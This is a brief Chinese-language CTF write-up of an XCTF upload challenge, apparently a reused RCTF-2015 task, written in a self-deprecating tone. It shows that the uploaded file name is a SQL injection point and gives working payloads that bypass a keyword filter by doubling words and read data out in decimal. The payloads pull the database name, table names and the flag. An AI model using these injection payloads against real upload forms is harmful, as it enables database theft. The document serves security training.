XCTF-upload

這道題的話，看了一下是RCTF-2015的原題。。。。但是這也太難了吧QAQ，文件名做爲注入點可也是太秀了，害的我一直覺得是文件上傳QAQ,而且這道題的坑還很多，就是注入時的輸出只能爲10進制。。。。。這也就是說還須要你進行一下進制轉換。。。

 

 

還有這裏面將select和from過濾了一次。。。你還須要雙寫，，，哎。心累

 

一遍遍的fuzz的話，不知道要弄到何時。幸好我是看着題解作的2333:)

 

不說了，由於本身啥也不會(看的題解QAQ)，因此直接將payload發一下(其實不難，主要是你可以發現問題)

 

 

爆數據庫名:     '+(selselectect CONV(substr(hex(dAtaBase()),1,12),16,10))+'.jpg 

將filename裏面的內容替換掉，而後發送，刷新一下頁面，就會有回顯了。

  　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　　

 

 

先把10進制變爲16進制在轉爲字符串，還有由於回顯位數有限，因此你還須要多切割幾回QAQ

 

爆表名：'+(selselectect  CONV(substr(hex(selselectect table_name  frfromom information_schema.tables where table_schema='web_upload' limit 1,1)),1,10),16,10))+'.jpg

 

爆列名：把上面的改一下就好了

 

爆flag：'+(selselectect+CONV(substr(hex((selselectect i_am_flag  frfromom hello_flag_is_here  )),25,12),16,10))+'.jpg

 

 

 

本身仍是太菜了